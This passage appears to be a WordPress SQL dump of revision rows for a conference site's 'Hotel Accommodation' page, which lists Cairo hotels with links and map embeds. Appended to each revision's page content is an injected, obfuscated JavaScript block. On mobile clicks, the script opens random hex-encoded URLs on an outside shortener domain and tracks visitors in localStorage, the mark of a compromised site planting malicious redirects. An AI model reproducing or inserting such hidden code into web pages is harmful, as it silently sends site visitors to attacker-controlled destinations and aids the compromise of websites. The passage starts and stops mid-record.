_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 07:00:52','2023-01-25 07:00:52','',2685,'https://gsw2023.com/?p=3648',0,'revision','',0),
(3649,1,'2023-01-25 07:02:13','2023-01-25 07:02:13','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 07:02:13','2023-01-25 07:02:13','',2685,'https://gsw2023.com/?p=3649',0,'revision','',0),
(3650,1,'2023-01-25 07:07:42','2023-01-25 07:07:42','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<p><a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38